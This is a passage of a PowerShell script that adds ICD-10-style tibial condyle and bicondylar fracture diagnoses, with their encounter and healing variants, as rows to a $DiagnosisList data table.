tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right tibia","Displaced fracture of medial condyle of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left tibia","Displaced fracture of medial condyle of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified tibia","Displaced fracture of medial condyle of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right tibia","Nondisplaced fracture of medial condyle of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left tibia","Nondisplaced fracture of medial condyle of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified tibia","Nondisplaced fracture of medial condyle of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of right tibia","Displaced bicondylar fracture of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of left tibia","Displaced bicondylar fracture of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bicondylar fracture of unspecified tibia","Displaced bicondylar fracture of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of right tibia","Nondisplaced bicondylar fracture of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left 